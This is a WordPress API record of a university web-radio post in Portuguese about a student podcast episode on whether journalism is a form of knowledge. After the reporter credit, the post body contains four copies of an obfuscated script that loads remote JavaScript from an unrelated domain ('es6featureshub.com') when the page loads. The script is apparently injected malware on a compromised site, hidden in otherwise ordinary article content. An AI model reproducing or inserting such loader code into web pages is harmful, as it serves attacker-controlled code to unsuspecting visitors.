{"id":12949,"date":"2023-05-09T19:39:06","date_gmt":"2023-05-09T22:39:06","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=12949"},"modified":"2025-10-21T13:02:11","modified_gmt":"2025-10-21T16:02:11","slug":"o-jornalismo-e-uma-forma-de-conhecimento","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/","title":{"rendered":"O Jornalismo \u00e9 uma forma de conhecimento?"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;O Jornalismo \u00e9 uma forma de conhecimento?&#8221;<\/p><p class=\"category\">Espa\u00e7o Experimental<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/ESPACO-EXPERIMENTAL-PODCAST-O-JORNALISMO-E-UMA-FORMA-DE-CONHECIMENTO-2023-1.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>O Jornalismo \u00e9 uma forma de conhecimento? Esse \u00e9 tema do primeiro epis\u00f3dio da s\u00e9rie de podcast denominada \u201cJornalismo em Pauta\u201d. O trabalho, dividido em seis programas, \u00e9 resultado da disciplina Teoria do Jornalismo, sob a orienta\u00e7\u00e3o do professor Leandro Lage, da <a href=\"https:\/\/www.instagram.com\/facomufpa\/?hl=pt\" target=\"_blank\" rel=\"noreferrer noopener\">Faculdade de Comunica\u00e7\u00e3o da UFPA.<\/a><\/p>\n\n\n\n<p>O podcast em destaque \u00e9 baseado no texto \u201cO Jornalismo \u00e9 uma forma de conhecimento?\u201d, do autor Eduardo Meditsch e, tamb\u00e9m, no artigo \u201cA not\u00edcia como forma de conhecimento\u201d, de Robert Park. Afinal, o jornalismo \u00e9 ou n\u00e3o uma forma de conhecimento? O jornalismo&nbsp; produz conhecimento ou somente reproduz conhecimento?&nbsp; O que diferencia um fato produzido por um jornalista e por um historiador? S\u00e3o algumas das muitas reflex\u00f5es abordadas sobre as v\u00e1rias formas de conhecimentos produzidas na sociedade.<\/p>\n\n\n\n<p>Neste epis\u00f3dio, os estudantes Andr\u00e9 furtado e Gabriela Cardoso, que apresentam o podcast, conversam com o jornalista e pesquisador Guilherme Guerreiro Neto. Para ele, \u201co Jornalismo vai al\u00e9m do simples repasse de uma informa\u00e7\u00e3o. De alguma forma, o Jornalismo estaria como uma das possibilidades de constru\u00e7\u00e3o de conhecimento. O Jornalismo se abastece dos acontecimentos do presente, embora ele esteja sempre em di\u00e1logos com o passado e com proje\u00e7\u00f5es do que vem a seguir\u201d. &nbsp;<\/p>\n\n\n\n<p>Uma outra quest\u00e3o apresentada no podcast \u00e9 a regulamenta\u00e7\u00e3o da m\u00eddia tradicional no Brasil, que, ainda hoje, se concentra nas m\u00e3os de uma minoria, sendo comum um grupo pol\u00edtico ser propriet\u00e1rio de v\u00e1rios ve\u00edculos de comunica\u00e7\u00e3o. Assim, a regulariza\u00e7\u00e3o n\u00e3o diz respeito a censura de conte\u00fado, ao contr\u00e1rio, seria a organiza\u00e7\u00e3o do setor para que haja mais pluralidade de narrativas, fazendo com que o Jornalismo n\u00e3o seja apenas objetivo e parcial no sentido de destacar somente o que interessa aos donos das empresas.&nbsp;&nbsp; &nbsp;<\/p>\n\n\n\n<p>O Jornalismo \u00e9 uma forma de conhecimento? \u00e9 um podcast produzido pelos estudantes da turma de Jornalismo 2022: Rebeca Reis, Julia Ladeira, Kauan Lima, Joyce Silva, Vit\u00f3ria Rodrigues, Andr\u00e9 Furtado e Gabriela Cardoso, sob a orienta\u00e7\u00e3o do professor Leandro Lages. &nbsp;Para entender melhor o papel do Jornalismo na atualidade, n\u00e3o perca est\u00e1 edi\u00e7\u00e3o do <a href=\"https:\/\/radio.ufpa.br\/index.php\/category\/espaco-experimental\/\" target=\"_blank\" rel=\"noreferrer noopener\">Espa\u00e7o Experimental.<\/a><\/p>\n\n\n\n<p>Reportagem: Denily Carvalho  <\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"O Jornalismo \u00e9 uma forma de conhecimento?\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/\" aria-label=\"Read more about O Jornalismo \u00e9 uma forma de conhecimento?\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":13141,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[161],"tags":[],"class_list":["post-12949","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-espaco-experimental"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>O Jornalismo \u00e9 uma forma de conhecimento? - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"O Jornalismo \u00e9 uma forma de conhecimento? Esse \u00e9 tema do primeiro epis\u00f3dio da s\u00e9rie de podcast denominada \u201cJornalismo em Pauta\u201d\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"O Jornalismo \u00e9 uma forma de conhecimento? - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"O Jornalismo \u00e9 uma forma de conhecimento? Esse \u00e9 tema do primeiro epis\u00f3dio da s\u00e9rie de podcast denominada \u201cJornalismo em Pauta\u201d\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2023-05-09T22:39:06+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T16:02:11+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/pexels-photo-518543.webp?fit=600%2C400&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"600\" \/>\n\t<meta property=\"og:image:height\" content=\"400\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"O Jornalismo \u00e9 uma forma de conhecimento?\",\"datePublished\":\"2023-05-09T22:39:06+00:00\",\"dateModified\":\"2025-10-21T16:02:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/\"},\"wordCount\":392,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/pexels-photo-518543.webp?fit=600%2C400&ssl=1\",\"articleSection\":[\"Espa\u00e7o Experimental\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/\",\"name\":\"O Jornalismo \u00e9 uma forma de conhecimento? - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/pexels-photo-518543.webp?fit=600%2C400&ssl=1\",\"datePublished\":\"2023-05-09T22:39:06+00:00\",\"dateModified\":\"2025-10-21T16:02:11+00:00\",\"description\":\"O Jornalismo \u00e9 uma forma de conhecimento? Esse \u00e9 tema do primeiro epis\u00f3dio da s\u00e9rie de podcast denominada \u201cJornalismo em Pauta\u201d\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/pexels-photo-518543.webp?fit=600%2C400&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/pexels-photo-518543.webp?fit=600%2C400&ssl=1\",\"width\":600,\"height\":400,\"caption\":\"O Jornalismo \u00e9 uma forma de conhecimento?\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"O Jornalismo \u00e9 uma forma de conhecimento?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"O Jornalismo \u00e9 uma forma de conhecimento? - Radio Web UFPA","description":"O Jornalismo \u00e9 uma forma de conhecimento? Esse \u00e9 tema do primeiro epis\u00f3dio da s\u00e9rie de podcast denominada \u201cJornalismo em Pauta\u201d","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/","og_locale":"pt_BR","og_type":"article","og_title":"O Jornalismo \u00e9 uma forma de conhecimento? - Radio Web UFPA","og_description":"O Jornalismo \u00e9 uma forma de conhecimento? Esse \u00e9 tema do primeiro epis\u00f3dio da s\u00e9rie de podcast denominada \u201cJornalismo em Pauta\u201d","og_url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2023-05-09T22:39:06+00:00","article_modified_time":"2025-10-21T16:02:11+00:00","og_image":[{"width":600,"height":400,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/pexels-photo-518543.webp?fit=600%2C400&ssl=1","type":"image\/webp"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"O Jornalismo \u00e9 uma forma de conhecimento?","datePublished":"2023-05-09T22:39:06+00:00","dateModified":"2025-10-21T16:02:11+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/"},"wordCount":392,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/pexels-photo-518543.webp?fit=600%2C400&ssl=1","articleSection":["Espa\u00e7o Experimental"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/","url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/","name":"O Jornalismo \u00e9 uma forma de conhecimento? - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/pexels-photo-518543.webp?fit=600%2C400&ssl=1","datePublished":"2023-05-09T22:39:06+00:00","dateModified":"2025-10-21T16:02:11+00:00","description":"O Jornalismo \u00e9 uma forma de conhecimento? Esse \u00e9 tema do primeiro epis\u00f3dio da s\u00e9rie de podcast denominada \u201cJornalismo em Pauta\u201d","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/pexels-photo-518543.webp?fit=600%2C400&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/pexels-photo-518543.webp?fit=600%2C400&ssl=1","width":600,"height":400,"caption":"O Jornalismo \u00e9 uma forma de conhecimento?"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/o-jornalismo-e-uma-forma-de-conhecimento\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"O Jornalismo \u00e9 uma forma de conhecimento?"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/05\/pexels-photo-518543.webp?fit=600%2C400&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-3mR","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12949","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=12949"}],"version-history":[{"count":22,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12949\/revisions"}],"predecessor-version":[{"id":17806,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12949\/revisions\/17806"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/13141"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=12949"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=12949"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=12949"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}